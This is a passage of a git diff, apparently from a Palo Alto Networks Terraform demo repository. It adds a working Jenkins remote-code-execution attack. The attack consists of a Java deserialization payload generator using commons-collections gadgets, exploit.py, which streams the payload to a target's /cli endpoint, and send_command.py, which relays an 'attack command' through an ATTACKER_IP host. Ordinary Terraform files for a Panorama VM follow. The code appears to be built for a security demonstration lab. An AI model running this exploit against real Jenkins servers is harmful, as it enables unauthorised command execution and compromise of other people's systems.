+ a2.add(csls);
+ a2.add(set);
+
+ ReferenceMap flat3map = new ReferenceMap();
+ flat3map.put(new Container(a1), "asdf");
+ flat3map.put(new Container(a2), "asdf");
+
+ return flat3map;
+ }
+
+ private Object writeReplace() throws ObjectStreamException {
+ return this.payload;
+ }
+
+ static class Container implements Serializable {
+
+ private Object o;
+
+ public Container(Object o) {
+ this.o = o;
+ }
+
+ private Object writeReplace() throws ObjectStreamException {
+ return o;
+ }
+
+ }
+
+ static class DummyComperator implements Comparator, Serializable {
+
+ public int compare(Object arg0, Object arg1) {
+ // TODO Auto-generated method stub
+ return 0;
+ }
+
+ private Object writeReplace() throws ObjectStreamException {
+ return null;
+ }
+
+ }
+
+ public static void main(String args[]) throws Exception{
+
+ if(args.length != 2){
+ System.out.println("java -jar payload.jar outfile cmd");
+ System.exit(0);
+ }
+
+ String cmd = args[1];
+ FileOutputStream out = new FileOutputStream(args[0]);
+
+ Payload pwn = new Payload(cmd);
+ ObjectOutputStream oos = new ObjectOutputStream(out);
+ oos.writeObject(pwn);
+ oos.flush();
+ out.flush();
+
+
+ }
+
+}
\ No newline at end of file
diff --git a/azure/Jenkins_proj-working/payload/commons-beanutils-1.8.3.jar b/azure/Jenkins_proj-working/payload/commons-beanutils-1.8.3.jar
new file mode 100644
index 00000000..218510bc
Binary files /dev/null and b/azure/Jenkins_proj-working/payload/commons-beanutils-1.8.3.jar differ
diff --git a/azure/Jenkins_proj-working/payload/commons-collections-3.2.1.jar b/azure/Jenkins_proj-working/payload/commons-collections-3.2.1.jar
new file mode 100644
index 00000000..c35fa1fe
Binary files /dev/null and b/azure/Jenkins_proj-working/payload/commons-collections-3.2.1.jar differ
diff --git a/azure/Jenkins_proj-working/payload/commons-lang-2.6.jar b/azure/Jenkins_proj-working/payload/commons-lang-2.6.jar
new file mode 100644
index 00000000..98467d3a
Binary files /dev/null and b/azure/Jenkins_proj-working/payload/commons-lang-2.6.jar differ
diff --git a/azure/Jenkins_proj-working/payload/commons-logging-1.2.jar b/azure/Jenkins_proj-working/payload/commons-logging-1.2.jar
new file mode 100644
index 00000000..93a3b9f6
Binary files /dev/null and b/azure/Jenkins_proj-working/payload/commons-logging-1.2.jar differ
diff --git a/azure/Jenkins_proj-working/payload/exploit.py b/azure/Jenkins_proj-working/payload/exploit.py
new file mode 100644
index 00000000..89c789d4
--- /dev/null
+++ b/azure/Jenkins_proj-working/payload/exploit.py
@@ -0,0 +1,92 @@
+import urllib
+import requests
+import uuid
+import threading
+import time
+import gzip
+import urllib3
+import zlib
+import subprocess
+
+proxies = {
+# 'http': 'http://127.0.0.1:8085',
+# 'https': 'http://127.0.0.1:8090',
+}
+
+TARGET = input("Enter Jenkins Target IP Address: ")
+URL='http://' + TARGET + ':80/cli'
+
+PREAMBLE = b'<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4='
+PROTO = b'\x00\x00\x00\x00'
+
+
+FILE_SER = open("payload.ser", "rb").read()
+
+def download(url, session):
+
+ headers = {'Side' : 'download'}
+ #headers['Content-type'] = 'application/x-www-form-urlencoded'
+ headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'
+ headers['X-CSRF-Token'] = 'DEADC0DEDEADBEEFCAFEBABEDABBAD00DBB0'
+ headers['Session'] = session
+ headers['Transfer-Encoding'] = 'chunked'
+ r = requests.post(url, data=null_payload(),headers=headers, proxies=proxies, stream=True)
+ print(r.content)
+
+
+def upload(url, session, data):
+
+ headers = {'Side' : 'upload'}
+ headers['Session'] = session
+ #headers['Content-type'] = 'application/octet-stream'
+ headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'
+ #headers['Content-Length'] = '335'
+ headers['X-CSRF-Token'] = 'DEADC0DEDEADBEEFCAFEBABEDABBAD00DBB0'
+ headers['Accept-Encoding'] = None
+ r = requests.post(url,data=data,headers=headers,proxies=proxies)
+
+
+def upload_chunked(url,session, data):
+
+ headers = {'Side' : 'upload'}
+ headers['Session'] = session
+ #headers['Content-type'] = 'application/octet-stream'
+ headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'
+ #headers['Content-Length'] = '335'
+ headers['X-CSRF-Token'] = 'DEADC0DEDEADBEEFCAFEBABEDABBAD00DBB0'
+ headers['Accept-Encoding']= None
+ headers['Transfer-Encoding'] = 'chunked'
+ headers['Cache-Control'] = 'no-cache'
+
+ r = requests.post(url, headers=headers, data=create_payload_chunked(), proxies=proxies)
+
+
+def null_payload():
+ yield b" "
+
+def create_payload():
+ payload = PREAMBLE + PROTO + FILE_SER
+
+ return payload
+
+def create_payload_chunked():
+ yield PREAMBLE
+ yield PROTO
+ yield FILE_SER
+
+def main():
+ print("start")
+
+ session = str(uuid.uuid4())
+
+ t = threading.Thread(target=download, args=(URL, session))
+ t.start()
+
+ time.sleep(1)
+ print("pwn")
+ #upload(URL, session, create_payload())
+
+ upload_chunked(URL, session, "asdf")
+
+if __name__ == "__main__":
+ main()
diff --git a/azure/Jenkins_proj-working/payload/ezmorph-1.0.6.jar b/azure/Jenkins_proj-working/payload/ezmorph-1.0.6.jar
new file mode 100644
index 00000000..30fad12d
Binary files /dev/null and b/azure/Jenkins_proj-working/payload/ezmorph-1.0.6.jar differ
diff --git a/azure/Jenkins_proj-working/payload/json-lib-2.4-jenkins-2.jar b/azure/Jenkins_proj-working/payload/json-lib-2.4-jenkins-2.jar
new file mode 100644
index 00000000..a47f128a
Binary files /dev/null and b/azure/Jenkins_proj-working/payload/json-lib-2.4-jenkins-2.jar differ
diff --git a/azure/Jenkins_proj-working/payload/payload.jar b/azure/Jenkins_proj-working/payload/payload.jar
new file mode 100644
index 00000000..51e0bcc9
Binary files /dev/null and b/azure/Jenkins_proj-working/payload/payload.jar differ
diff --git a/azure/Jenkins_proj-working/requirements.txt b/azure/Jenkins_proj-working/requirements.txt
new file mode 100644
index 00000000..c36b3a97
--- /dev/null
+++ b/azure/Jenkins_proj-working/requirements.txt
@@ -0,0 +1,227 @@
+adal==1.2.1
+amqp==2.4.2
+antlr4-python3-runtime==4.7.2
+applicationinsights==0.11.7
+argcomplete==1.9.5
+asgiref==3.0.0
+asn1crypto==0.24.0
+async-timeout==3.0.1
+atomicwrites==1.3.0
+attrs==19.1.0
+autobahn==19.3.3
+Automat==0.7.0
+azure-batch==6.0.0
+azure-cli==2.0.63
+azure-cli-acr==2.2.5
+azure-cli-acs==2.3.22
+azure-cli-advisor==2.0.0
+azure-cli-ams==0.4.5
+azure-cli-appservice==0.2.18
+azure-cli-backup==1.2.4
+azure-cli-batch==4.0.0
+azure-cli-batchai==0.4.8
+azure-cli-billing==0.2.1
+azure-cli-botservice==0.1.10
+azure-cli-cdn==0.2.3
+azure-cli-cloud==2.1.1
+azure-cli-cognitiveservices==0.2.5
+azure-cli-command-modules-nspkg==2.0.2
+azure-cli-configure==2.0.22
+azure-cli-consumption==0.4.2
+azure-cli-container==0.3.16
+azure-cli-core==2.0.63
+azure-cli-cosmosdb==0.2.10
+azure-cli-deploymentmanager==0.1.0
+azure-cli-dla==0.2.5
+azure-cli-dls==0.1.9
+azure-cli-dms==0.1.3
+azure-cli-eventgrid==0.2.3
+azure-cli-eventhubs==0.3.4
+azure-cli-extension==0.2.5
+azure-cli-feedback==2.2.1
+azure-cli-find==0.3.2
+azure-cli-hdinsight==0.3.3
+azure-cli-interactive==0.4.3
+azure-cli-iot==0.3.8
+azure-cli-iotcentral==0.1.6
+azure-cli-keyvault==2.2.14
+azure-cli-kusto==0.2.2
+azure-cli-lab==0.1.7
+azure-cli-maps==0.3.4
+azure-cli-monitor==0.2.13
+azure-cli-network==2.3.7
+azure-cli-nspkg==3.0.3
+azure-cli-policyinsights==0.1.2
+azure-cli-privatedns==1.0.0
+azure-cli-profile==2.1.5
+azure-cli-rdbms==0.3.10
+azure-cli-redis==0.4.2
+azure-cli-relay==0.1.4
+azure-cli-reservations==0.4.2
+azure-cli-resource==2.1.14
+azure-cli-role==2.6.0
+azure-cli-search==0.1.1
+azure-cli-security==0.1.1
+azure-cli-servicebus==0.3.4
+azure-cli-servicefabric==0.1.17
+azure-cli-signalr==1.0.0
+azure-cli-sql==2.2.2
+azure-cli-sqlvm==0.1.1
+azure-cli-storage==2.4.1
+azure-cli-telemetry==1.0.2
+azure-cli-vm==2.2.19
+azure-common==1.1.20
+azure-datalake-store==0.0.39
+azure-functions-devops-build==0.0.21
+azure-graphrbac==0.60.0
+azure-keyvault==1.1.0
+azure-mgmt-advisor==2.0.1
+azure-mgmt-applicationinsights==0.1.1
+azure-mgmt-authorization==0.50.0
+azure-mgmt-batch==6.0.0
+azure-mgmt-batchai==2.0.0
+azure-mgmt-billing==0.2.0
+azure-mgmt-botservice==0.1.0
+azure-mgmt-cdn==3.1.0
+azure-mgmt-cognitiveservices==3.0.0
+azure-mgmt-compute==4.6.1
+azure-mgmt-consumption==2.0.0
+azure-mgmt-containerinstance==1.4.0
+azure-mgmt-containerregistry==2.7.0
+azure-mgmt-containerservice==4.4.0
+azure-mgmt-cosmosdb==0.5.2
+azure-mgmt-datalake-analytics==0.2.1
+azure-mgmt-datalake-nspkg==3.0.1
+azure-mgmt-datalake-store==0.5.0
+azure-mgmt-datamigration==0.1.0
+azure-mgmt-deploymentmanager==0.1.0
+azure-mgmt-devtestlabs==2.2.0
+azure-mgmt-dns==2.1.0
+azure-mgmt-eventgrid==2.0.0
+azure-mgmt-eventhub==2.3.0
+azure-mgmt-hdinsight==0.2.1
+azure-mgmt-iotcentral==1.0.0
+azure-mgmt-iothub==0.7.0
+azure-mgmt-iothubprovisioningservices==0.2.0
+azure-mgmt-keyvault==1.1.0
+azure-mgmt-kusto==0.3.0
+azure-mgmt-loganalytics==0.2.0
+azure-mgmt-managementgroups==0.1.0
+azure-mgmt-maps==0.1.0
+azure-mgmt-marketplaceordering==0.1.0
+azure-mgmt-media==1.1.1
+azure-mgmt-monitor==0.5.2
+azure-mgmt-msi==0.2.0
+azure-mgmt-network==2.6.0
+azure-mgmt-nspkg==3.0.2
+azure-mgmt-policyinsights==0.2.0
+azure-mgmt-privatedns==0.1.0
+azure-mgmt-rdbms==1.7.1
+azure-mgmt-recoveryservices==0.1.1
+azure-mgmt-recoveryservicesbackup==0.1.2
+azure-mgmt-redis==6.0.0
+azure-mgmt-relay==0.1.0
+azure-mgmt-reservations==0.3.1
+azure-mgmt-resource==2.1.0
+azure-mgmt-search==2.0.0
+azure-mgmt-security==0.1.0
+azure-mgmt-servicebus==0.5.3
+azure-mgmt-servicefabric==0.2.0
+azure-mgmt-signalr==0.1.1
+azure-mgmt-sql==0.12.0
+azure-mgmt-sqlvirtualmachine==0.2.0
+azure-mgmt-storage==3.1.1
+azure-mgmt-trafficmanager==0.51.0
+azure-mgmt-web==0.41.0
+azure-multiapi-storage==0.2.3
+azure-nspkg==3.0.2
+azure-storage==0.36.0
+azure-storage-blob==1.3.1
+azure-storage-common==1.4.0
+azure-storage-file==1.4.0
+azure-storage-nspkg==3.1.0
+bcrypt==3.1.6
+billiard==3.6.0.0
+celery==4.3.0
+certifi==2019.3.9
+cffi==1.12.3
+chardet==3.0.4
+collections2==0.3.0
+colorama==0.4.1
+constantly==15.1.0
+cryptography==2.4.2
+decorator==4.4.0
+Django==2.2.4
+django-widget-tweaks==1.4.3
+docker==3.7.2
+docker-pycreds==0.4.0
+fabric==2.4.0
+gitdb2==2.0.5
+GitPython==2.1.11
+gunicorn==19.9.0
+humanfriendly==4.18
+hyperlink==18.0.0
+idna==2.8
+incremental==17.5.0
+invoke==1.2.0
+ipaddress==1.0.22
+isodate==0.6.0
+Jinja2==2.10.1
+jmespath==0.9.4
+jsonpath-ng==1.4.3
+knack==0.5.4
+kombu==4.5.0
+MarkupSafe==1.1.1
+mock==2.0.0
+more-itertools==7.0.0
+msrest==0.6.6
+msrestazure==0.6.0
+oauthlib==3.0.1
+oyaml==0.9
+pan-python==0.14.0
+pandevice==0.6.6
+paramiko==2.4.2
+passlib==1.7.1
+pbr==5.2.0
+pluggy==0.9.0
+ply==3.11
+portalocker==1.2.1
+prompt-toolkit==1.0.15
+psutil==5.6.6
+py==1.8.0
+pyAesCrypt==0.4.2
+pyasn1==0.4.5
+pycparser==2.19
+pydocumentdb==2.3.3
+Pygments==2.3.1
+PyHamcrest==1.9.0
+PyJWT==1.7.1
+PyNaCl==1.3.0
+pyOpenSSL==19.0.0
+pyperclip==1.7.0
+pytest==4.4.0
+pytest-django==3.4.8
+python-dateutil==2.8.0
+python-terraform==0.10.0
+pytz==2019.1
+PyYAML==5.1
+requests==2.21.0
+requests-oauthlib==1.2.0
+scp==0.13.2
+six==1.12.0
+smmap2==2.0.5
+sqlparse==0.3.0
+sshtunnel==0.1.4
+tabulate==0.8.3
+Twisted==18.9.0
+txaio==18.8.1
+urllib3==1.24.2
+vine==1.3.0
+virtualenv==16.4.3
+virtualenv-clone==0.5.2
+vsts==0.1.25
+vsts-cd-manager==1.0.2
+wcwidth==0.1.7
+websocket-client==0.56.0
+xmltodict==0.12.0
+zope.interface==4.6.0
diff --git a/azure/Jenkins_proj-working/requirementsold2.txt b/azure/Jenkins_proj-working/requirementsold2.txt
new file mode 100644
index 00000000..68742357
--- /dev/null
+++ b/azure/Jenkins_proj-working/requirementsold2.txt
@@ -0,0 +1,222 @@
+adal==1.2.1
+amqp==2.4.2
+antlr4-python3-runtime==4.7.2
+applicationinsights==0.11.8
+argcomplete==1.9.5
+asgiref==3.0.0
+asn1crypto==0.24.0
+async-timeout==3.0.1
+atomicwrites==1.3.0
+attrs==19.1.0
+autobahn==19.3.3
+Automat==0.7.0
+azure-batch==6.0.0
+azure-cli==2.0.63
+azure-cli-acr==2.2.5
+azure-cli-acs==2.3.22
+azure-cli-advisor==2.0.0
+azure-cli-ams==0.4.5
+azure-cli-appservice==0.2.18
+azure-cli-backup==1.2.4
+azure-cli-batch==4.0.0
+azure-cli-batchai==0.4.8
+azure-cli-billing==0.2.1
+azure-cli-botservice==0.1.10
+azure-cli-cdn==0.2.3
+azure-cli-cloud==2.1.1
+azure-cli-cognitiveservices==0.2.5
+azure-cli-command-modules-nspkg==2.0.2
+azure-cli-configure==2.0.22
+azure-cli-consumption==0.4.2
+azure-cli-container==0.3.16
+azure-cli-core==2.0.63
+azure-cli-cosmosdb==0.2.10
+azure-cli-deploymentmanager==0.1.0
+azure-cli-dla==0.2.5
+azure-cli-dls==0.1.9
+azure-cli-dms==0.1.3
+azure-cli-eventgrid==0.2.3
+azure-cli-eventhubs==0.3.4
+azure-cli-extension==0.2.5
+azure-cli-feedback==2.2.1
+azure-cli-find==0.3.2
+azure-cli-hdinsight==0.3.3
+azure-cli-interactive==0.4.3
+azure-cli-iot==0.3.8
+azure-cli-iotcentral==0.1.6
+azure-cli-keyvault==2.2.14
+azure-cli-kusto==0.2.2
+azure-cli-lab==0.1.7
+azure-cli-maps==0.3.4
+azure-cli-monitor==0.2.13
+azure-cli-network==2.3.7
+azure-cli-nspkg==3.0.3
+azure-cli-policyinsights==0.1.2
+azure-cli-privatedns==1.0.0
+azure-cli-profile==2.1.5
+azure-cli-rdbms==0.3.10
+azure-cli-redis==0.4.2
+azure-cli-relay==0.1.4
+azure-cli-reservations==0.4.2
+azure-cli-resource==2.1.14
+azure-cli-role==2.6.0
+azure-cli-search==0.1.1
+azure-cli-security==0.1.1
+azure-cli-servicebus==0.3.4
+azure-cli-servicefabric==0.1.17
+azure-cli-signalr==1.0.0
+azure-cli-sql==2.2.2
+azure-cli-sqlvm==0.1.1
+azure-cli-storage==2.4.1
+azure-cli-telemetry==1.0.2
+azure-cli-vm==2.2.19
+azure-common==1.1.20
+azure-datalake-store==0.0.39
+azure-functions-devops-build==0.0.21
+azure-graphrbac==0.60.0
+azure-keyvault==1.1.0
+azure-mgmt-advisor==2.0.1
+azure-mgmt-applicationinsights==0.1.1
+azure-mgmt-authorization==0.50.0
+azure-mgmt-batch==6.0.0
+azure-mgmt-batchai==2.0.0
+azure-mgmt-billing==0.2.0
+azure-mgmt-botservice==0.1.0
+azure-mgmt-cdn==3.1.0
+azure-mgmt-cognitiveservices==3.0.0
+azure-mgmt-compute==4.6.1
+azure-mgmt-consumption==2.0.0
+azure-mgmt-containerinstance==1.4.0
+azure-mgmt-containerregistry==2.7.0
+azure-mgmt-containerservice==4.4.0
+azure-mgmt-cosmosdb==0.5.2
+azure-mgmt-datalake-analytics==0.2.1
+azure-mgmt-datalake-nspkg==3.0.1
+azure-mgmt-datalake-store==0.5.0
+azure-mgmt-datamigration==0.1.0
+azure-mgmt-deploymentmanager==0.1.0
+azure-mgmt-devtestlabs==2.2.0
+azure-mgmt-dns==2.1.0
+azure-mgmt-eventgrid==2.0.0
+azure-mgmt-eventhub==2.3.0
+azure-mgmt-hdinsight==0.2.1
+azure-mgmt-iotcentral==1.0.0
+azure-mgmt-iothub==0.7.0
+azure-mgmt-iothubprovisioningservices==0.2.0
+azure-mgmt-keyvault==1.1.0
+azure-mgmt-kusto==0.3.0
+azure-mgmt-loganalytics==0.2.0
+azure-mgmt-managementgroups==0.1.0
+azure-mgmt-maps==0.1.0
+azure-mgmt-marketplaceordering==0.1.0
+azure-mgmt-media==1.1.1
+azure-mgmt-monitor==0.5.2
+azure-mgmt-msi==0.2.0
+azure-mgmt-network==2.6.0
+azure-mgmt-nspkg==3.0.2
+azure-mgmt-policyinsights==0.2.0
+azure-mgmt-privatedns==0.1.0
+azure-mgmt-rdbms==1.7.1
+azure-mgmt-recoveryservices==0.1.1
+azure-mgmt-recoveryservicesbackup==0.1.2
+azure-mgmt-redis==6.0.0
+azure-mgmt-relay==0.1.0
+azure-mgmt-reservations==0.3.1
+azure-mgmt-resource==2.1.0
+azure-mgmt-search==2.0.0
+azure-mgmt-security==0.1.0
+azure-mgmt-servicebus==0.5.3
+azure-mgmt-servicefabric==0.2.0
+azure-mgmt-signalr==0.1.1
+azure-mgmt-sql==0.12.0
+azure-mgmt-sqlvirtualmachine==0.2.0
+azure-mgmt-storage==3.1.1
+azure-mgmt-trafficmanager==0.51.0
+azure-mgmt-web==0.41.0
+azure-multiapi-storage==0.2.3
+azure-nspkg==3.0.2
+azure-storage-blob==1.3.1
+azure-storage-common==1.4.0
+azure-storage-nspkg==3.1.0
+bcrypt==3.1.6
+billiard==3.6.0.0
+celery==4.3.0
+certifi==2019.3.9
+cffi==1.12.3
+chardet==3.0.4
+colorama==0.4.1
+constantly==15.1.0
+cryptography==2.4.2
+decorator==4.4.0
+Django==2.2
+django-widget-tweaks==1.4.3
+docker==3.7.2
+docker-pycreds==0.4.0
+fabric==2.4.0
+gitdb2==2.0.5
+GitPython==2.1.11
+gunicorn==19.9.0
+humanfriendly==4.18
+hyperlink==18.0.0
+idna==2.8
+incremental==17.5.0
+invoke==1.2.0
+ipaddress==1.0.22
+isodate==0.6.0
+Jinja2==2.10.1
+jmespath==0.9.4
+jsonpath-ng==1.4.3
+knack==0.5.4
+kombu==4.5.0
+MarkupSafe==1.1.1
+mock==2.0.0
+more-itertools==7.0.0
+msrest==0.6.6
+msrestazure==0.6.0
+oauthlib==3.0.1
+oyaml==0.9
+pan-python==0.14.0
+paramiko==2.4.2
+passlib==1.7.1
+pbr==5.2.0
+pluggy==0.9.0
+ply==3.11
+portalocker==1.4.0
+prompt-toolkit==2.0.9
+psutil==5.6.6
+py==1.8.0
+pyAesCrypt==0.4.2
+pyasn1==0.4.5
+pycparser==2.19
+pydocumentdb==2.3.3
+Pygments==2.3.1
+PyHamcrest==1.9.0
+PyJWT==1.7.1
+PyNaCl==1.3.0
+pyOpenSSL==19.0.0
+pyperclip==1.7.0
+pytest==4.4.0
+pytest-django==3.4.8
+python-dateutil==2.8.0
+pytz==2019.1
+PyYAML==5.1
+requests==2.21.0
+requests-oauthlib==1.2.0
+scp==0.13.2
+six==1.12.0
+smmap2==2.0.5
+sqlparse==0.3.0
+sshtunnel==0.1.4
+tabulate==0.8.3
+Twisted==18.9.0
+txaio==18.8.1
+urllib3==1.24.2
+vine==1.3.0
+virtualenv==16.4.3
+virtualenv-clone==0.5.2
+vsts==0.1.25
+vsts-cd-manager==1.0.2
+wcwidth==0.1.7
+websocket-client==0.56.0
+xmltodict==0.12.0
+zope.interface==4.6.0
diff --git a/azure/Jenkins_proj-working/send_command.py b/azure/Jenkins_proj-working/send_command.py
new file mode 100644
index 00000000..cbccbdfb
--- /dev/null
+++ b/azure/Jenkins_proj-working/send_command.py
@@ -0,0 +1,63 @@
+#!/usr/bin/env python3
+
+import requests
+import argparse
+from python_terraform import Terraform
+import json
+import sys
+
+
+def get_terraform_outputs() -> dict:
+ tf = Terraform(working_dir='./WebInDeploy')
+ rc, out, err = tf.cmd('output', '-json')
+
+ if rc == 0:
+ try:
+ return json.loads(out)
+ except ValueError as ve:
+ print('Could not parse terraform outputs!')
+ return dict()
+
+
+def main(cli: str) -> None:
+
+ print('Attempting to launch exploit...\n')
+ outputs = get_terraform_outputs()
+
+ attacker = outputs['ATTACKER_IP']['value']
+ payload = dict()
+ payload['cli'] = cli
+
+ headers = dict()
+ headers['Content-Type'] = 'application/json'
+ headers['Accept'] = '*/*'
+
+ try:
+ resp = requests.post(f'http://{attacker}:5000/send', data=json.dumps(payload), headers=headers)
+ if resp.status_code == 200:
+ print('Command Successfully Executed!\n')
+ print(resp.text)
+ sys.exit(0)
+ else:
+ print('Could not Execute Command!\n')
+ print(resp.text)
+ sys.exit(0)
+ except ConnectionRefusedError as cre:
+ print('Could not connect to attacker instance!')
+ sys.exit(1)
+
+
+if __name__ == '__main__':
+ parser = argparse.ArgumentParser(description='Send Jenkins Attack Command')
+ parser.add_argument('-c', '--cli', help='Attack Command', required=True)
+ parser.add_argument('-m', '--manual_cli', help='Manual Attack Command', required=False)
+
+ args = parser.parse_args()
+ cli = args.cli
+ mcli = args.manual_cli
+
+ if mcli is not None and mcli != '':
+ main(mcli)
+ else:
+ main(cli)
+
diff --git a/azure/panorama_new_rg/README.md b/azure/panorama_new_rg/README.md
new file mode 100644
index 00000000..79c46c20
--- /dev/null
+++ b/azure/panorama_new_rg/README.md
@@ -0,0 +1,107 @@
+# Azure Panorama
+
+Terraform creates an instance of Panorama in a new Resource Group.
+
+## Prerequistes
+* Valid Azure Subscription
+* Access to Azure Cloud Shell
+
+## Caveats
+You will need to determine the available versions of Panorama using the Azure CLI. The following command will show the Panorama versions currently available
+
+bash-4.3# az vm image list -p paloaltonetworks -f panorama --all
+```
+[
+ {
+ "offer": "panorama",
+ "publisher": "paloaltonetworks",
+ "sku": "byol",
+ "urn": "paloaltonetworks:panorama:byol:8.1.0",
+ "version": "8.1.0"
+ },
+ {
+ "offer": "panorama",
+ "publisher": "paloaltonetworks",
+ "sku": "byol",
+ "urn": "paloaltonetworks:panorama:byol:8.1.2",
+ "version": "8.1.2"
+ },
+ {
+ "offer": "panorama",
+ "publisher": "paloaltonetworks",
+ "sku": "byol",
+ "urn": "paloaltonetworks:panorama:byol:9.1.1",
+ "version": "9.1.1"
+ }
+]
+```
+## How to Deploy
+### 1. Setup & Download Build
+In the Azure Portal, open Azure Cloud Shell and run the following command (**BASH ONLY!**):
+```
+# Accept VM-Series EULA for desired currently-available version of Panorama (see above command for urn)
+$ az vm image terms accept --urn paloaltonetworks:panorama:byol:8.1.2
+
+# Download repo & change directories to the Terraform build
+$ git clone https://github.com/wwce/terraform; cd terraform/azure/panorama_new_rg
+```
+
+### 2. Edit variables.tf or create terraform.tfvars
+The variables.tf file contains default settings for the template. It may be edited to suit specific requirements or the file terraform.tfvars.sample can be used to create a terraform.tfvars file to override some or all settings.
+
+Variable descriptions:
+
+ virtualMachineRG = Name of resource group to create
+
+ Location = Target Azure region
+
+ virtualNetworkName = Virtual Network Name
+
+ addressPrefix = VNet CIDR
+
+ subnetName = Subnet name in the VNet
+
+ subnet = Subnet CIDR
+
+ publicIpAddressName = Panorama public IP address name
+
+ networkInterfaceName = Panorama network interface name
+
+ networkSecurityGroupName = Network Security Group (NSG) name
+
+ diagnosticsStorageAccountName = Diagnostics Storage Account name
+
+ diagnosticsStorageAccountTier = Diagnostics Storage Account tier
+
+ diagnosticsStorageAccountReplication = Diagnostics Storage Account replication
+
+ virtualMachineName = Panorama VM name
+
+ virtualMachineSize = Panorama VM size
+
+ panoramaVersion = Panorama Version
+
+ adminUsername = Admin Username
+
+ adminPassword = Admin Password
+
+
+### 3. Deploy Build
+```
+$ terraform init
+$ terraform apply
+```
+
+
+
+## How to Destroy
+Run the following to destroy the build.
+```
+$ terraform destroy
+```
+
+
+
+## Support Policy
+The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself.
+Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy.
diff --git a/azure/panorama_new_rg/interfaces.tf b/azure/panorama_new_rg/interfaces.tf
new file mode 100644
index 00000000..f971b4e5
--- /dev/null
+++ b/azure/panorama_new_rg/interfaces.tf
@@ -0,0 +1,14 @@
+#### CREATE THE NETWORK INTERFACES ####
+
+resource "azurerm_network_interface" "panorama" {
+ name = "${var.networkInterfaceName}"
+ location = "${azurerm_resource_group.resourcegroup.location}"
+ resource_group_name = "${azurerm_resource_group.resourcegroup.name}"
+ ip_configuration {
+ name = "${var.networkInterfaceName}"
+ subnet_id = "${azurerm_subnet.panorama.id}"
+ private_ip_address_allocation = "Dynamic"
+ public_ip_address_id = "${azurerm_public_ip.panorama.id}"
+ }
+ depends_on = ["azurerm_public_ip.panorama"]
+}
\ No newline at end of file
diff --git a/azure/panorama_new_rg/nsg.tf b/azure/panorama_new_rg/nsg.tf
new file mode 100644
index 00000000..4e454d84
--- /dev/null
+++ b/azure/panorama_new_rg/nsg.tf
@@ -0,0 +1,32 @@
+resource "azurerm_network_security_group" "panorama" {
+ name = "${var.networkSecurityGroupName}"
+ resource_group_name = "${azurerm_resource_group.resourcegroup.name}"
+ location = "${azurerm_resource_group.resourcegroup.location}"
+
+ security_rule {
+ name = "TCP-22"
+ priority = 100
+ direction = "Inbound"
+ access = "Allow"
+ protocol = "*"
+ source_port_range = "*"
+ destination_port_range = "22"
+ source_address_prefix = "*"
+ destination_address_prefix = "${azurerm_network_interface.panorama.private_ip_address}"
+ }
+ security_rule {
+ name = "TCP-443"
+ priority = 110
+ direction = "Inbound"
+ access = "Allow"
+ protocol = "*"
+ source_port_range = "*"
+ destination_port_range = "443"
+ source_address_prefix = "*"
+ destination_address_prefix = "${azurerm_network_interface.panorama.private_ip_address}"
+ }
+}
+resource "azurerm_subnet_network_security_group_association" "panorama" {
+ subnet_id = "${azurerm_subnet.panorama.id}"
+ network_security_group_id = "${azurerm_network_security_group.panorama.id}"
+}
\ No newline at end of file
diff --git a/azure/panorama_new_rg/outputs.tf b/azure/panorama_new_rg/outputs.tf
new file mode 100644
index 00000000..b23d093b
--- /dev/null
+++ b/azure/panorama_new_rg/outputs.tf
@@ -0,0 +1,3 @@
+output "Panorama Public IP:" {
+ value = "${azurerm_public_ip.panorama.ip_address}"
+}
\ No newline at end of file
diff --git a/azure/panorama_new_rg/panorama.tf b/azure/panorama_new_rg/panorama.tf
new file mode 100644
index 00000000..4443ca98
--- /dev/null
+++ b/azure/panorama_new_rg/panorama.tf
@@ -0,0 +1,51 @@
+#### CREATE Panorama
+
+resource "azurerm_virtual_machine" "panorama" {
+ name = "${var.virtualMachineName}"
+ location = "${azurerm_resource_group.resourcegroup.location}"
+ resource_group_name = "${azurerm_resource_group.resourcegroup.name}"
+ network_interface_ids =
+ [
+ "${azurerm_network_interface.panorama.id}",
+ ]
+
+ primary_network_interface_id = "${azurerm_network_interface.panorama.id}"
+ vm_size = "${var.virtualMachineSize}"
+
+ plan {
+ name = "byol"
+ publisher = "paloaltonetworks"
+ product = "panorama"
+ }
+
+ storage_image_reference {
+ publisher = "paloaltonetworks"
+ offer = "panorama"
+ sku = "byol"
+ version = "${var.panoramaVersion}"
+ }
+
+ storage_os_disk {
+ name = "${var.virtualMachineName}"
+ caching = "ReadWrite"
+ create_option = "FromImage"
+ managed_disk_type = "StandardSSD_LRS"
+ }
+
+ delete_os_disk_on_termination = true
+ delete_data_disks_on_termination = true
+
+ os_profile {
+ computer_name = "${var.virtualMachineName}"
+ admin_username = "${var.adminUsername}"
+ admin_password = "${var.adminPassword}"
+ }
+
+ os_profile_linux_config {
+ disable_password_authentication = false
+ }
+ boot_diagnostics {
+ enabled = "true"
+ storage_uri = "${azurerm_storage_account.mystorageaccount.primary_blob_endpoint}"
+ }
+}
\ No newline at end of file
diff --git a/azure/panorama_new_rg/public-ips.tf b/azure/panorama_new_rg/public-ips.tf
new file mode 100644
index 00000000..09c1a7fc
--- /dev/null
+++ b/azure/panorama_new_rg/public-ips.tf
@@ -0,0 +1,7 @@
+#### CREATE PUBLIC IP ADDRESSES ####
+resource "azurerm_public_ip" panorama {
+ name = "${var.publicIpAddressName}"
